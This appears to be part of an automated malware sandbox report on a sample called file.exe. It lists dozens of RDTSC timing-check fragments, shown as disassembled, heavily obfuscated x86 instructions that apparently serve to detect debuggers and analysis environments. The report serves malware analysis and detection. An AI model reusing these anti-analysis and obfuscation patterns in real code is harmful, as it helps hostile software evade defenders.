                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2BE1 second address: EF2C0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007FC220745DF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2D3E second address: EF2D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007FC221A94B28h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2ECB second address: EF2EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E02h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2EE1 second address: EF2EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC221A94B36h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2EFF second address: EF2F26 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC220745E09h 0x00000008 jg 00007FC220745DF6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2F26 second address: EF2F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2F2C second address: EF2F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF4C9A second address: EF4CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 724B437Fh 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC221A94B28h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov esi, dword ptr [ebp+122D2BAEh] 0x00000030 push 21D0469Dh 0x00000035 je 00007FC221A94B34h 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007FC221A94B26h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF530D second address: EF5311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53D1 second address: EF53D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53D6 second address: EF53DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53DC second address: EF53EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b js 00007FC221A94B26h 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53EE second address: EF53F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53F3 second address: EF53F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF58D3 second address: EF58E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov dword ptr [ebp+122D2734h], edi 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF58E7 second address: EF58EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5951 second address: EF5957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF59AC second address: EF59BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5C49 second address: EF5C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5E03 second address: EF5E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5E08 second address: EF5E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC220745DF8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1B79h], ebx 0x0000002c jmp 00007FC220745E00h 0x00000031 mov dword ptr [ebp+124474C8h], ebx 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC220745E07h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5E71 second address: EF5E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF630E second address: EF6317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6317 second address: EF631B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF631B second address: EF6330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FC220745DF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6330 second address: EF6334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6334 second address: EF639E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c clc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FC220745DF8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FC220745DF8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 je 00007FC220745DFCh 0x0000004b mov esi, dword ptr [ebp+122D29C6h] 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jnc 00007FC220745DF6h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF639E second address: EF63D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FC221A94B31h 0x00000010 jmp 00007FC221A94B2Bh 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC221A94B38h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7C4F second address: EF7C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7C53 second address: EF7C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF865A second address: EF86AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FC220745DFFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 sub dword ptr [ebp+1244C01Ch], edx 0x00000016 xor dword ptr [ebp+1244C53Ah], edi 0x0000001c push 00000000h 0x0000001e mov edi, 550610D3h 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+124449ABh], edi 0x0000002b xchg eax, ebx 0x0000002c push ebx 0x0000002d jmp 00007FC220745E06h 0x00000032 pop ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF86AE second address: EF86B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF91C6 second address: EF91E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF91E3 second address: EF91E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8F20 second address: EF8F45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FC220745DFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBB33 second address: EFBB37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBB37 second address: EFBB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBB45 second address: EFBB4F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F00C83 second address: F00C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAC494 second address: EAC498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAC498 second address: EAC4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F04240 second address: F0428F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC221A94B32h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D1AAFh] 0x00000016 push 00000000h 0x00000018 mov bh, F0h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FC221A94B28h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a jl 00007FC221A94B26h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F050A7 second address: F050AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0613B second address: F0613F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F062DF second address: F062EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC220745DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0809B second address: F080A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F080A0 second address: F080F4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC220745DFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d xor ebx, dword ptr [ebp+122D1B0Fh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FC220745DF8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2B3Eh] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push esi 0x0000003c pop esi 0x0000003d je 00007FC220745DF6h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F07256 second address: F0725A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09135 second address: F09139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09139 second address: F0913F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0913F second address: F09149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC220745DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09149 second address: F091C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC221A94B28h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 clc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FC221A94B28h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 push 00000000h 0x00000045 jmp 00007FC221A94B39h 0x0000004a xchg eax, esi 0x0000004b push ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F091C5 second address: F091C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F091C9 second address: F091EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F091EF second address: F091F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F08349 second address: F0834D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0B2B3 second address: F0B310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jne 00007FC220745DFEh 0x0000000c nop 0x0000000d call 00007FC220745E01h 0x00000012 mov edi, dword ptr [ebp+122D2832h] 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c mov ebx, edi 0x0000001e pop ebx 0x0000001f push 00000000h 0x00000021 xor dword ptr [ebp+122D19CAh], eax 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push ebx 0x0000002a pushad 0x0000002b popad 0x0000002c pop ebx 0x0000002d pop eax 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jng 00007FC220745E08h 0x00000037 jmp 00007FC220745E02h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0C243 second address: F0C29D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC221A94B28h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push edx 0x00000027 add bx, 951Dh 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+124449ABh], eax 0x00000035 push 00000000h 0x00000037 call 00007FC221A94B31h 0x0000003c push eax 0x0000003d xor bh, 00000054h 0x00000040 pop edi 0x00000041 pop ebx 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0B4D3 second address: F0B4F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FC220745DFFh 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0E2E4 second address: F0E301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FC221A94B33h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0E301 second address: F0E30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745DFAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0D5F8 second address: F0D60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B31h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F59A second address: F0F5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F5A0 second address: F0F646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D273Fh], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FC221A94B28h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov bx, di 0x00000035 sub dword ptr [ebp+122D35A9h], ebx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 xor di, 3000h 0x00000047 mov eax, dword ptr [ebp+122D1519h] 0x0000004d mov dword ptr [ebp+122D1B79h], ebx 0x00000053 jnp 00007FC221A94B2Ch 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push ebx 0x0000005e call 00007FC221A94B28h 0x00000063 pop ebx 0x00000064 mov dword ptr [esp+04h], ebx 0x00000068 add dword ptr [esp+04h], 0000001Bh 0x00000070 inc ebx 0x00000071 push ebx 0x00000072 ret 0x00000073 pop ebx 0x00000074 ret 0x00000075 movsx ebx, dx 0x00000078 push eax 0x00000079 pushad 0x0000007a ja 00007FC221A94B2Ch 0x00000080 jo 00007FC221A94B2Ch 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F14551 second address: F14555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F14555 second address: F14571 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC221A94B2Ch 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F19D37 second address: F19D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F19D3F second address: F19D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F20893 second address: F208AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FC220745DF8h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FC220745DF6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F208AB second address: F208C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC221A94B2Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F208C7 second address: F208CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F208CB second address: F208EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FC221A94B32h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F208EE second address: F208F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24262 second address: F24269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24269 second address: F24285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E06h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24285 second address: F24289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24787 second address: F2478B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2478B second address: F247A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC221A94B31h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F247A6 second address: F247CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC220745DFDh 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FC220745DF6h 0x0000001b pop ebx 0x0000001c rdtsc
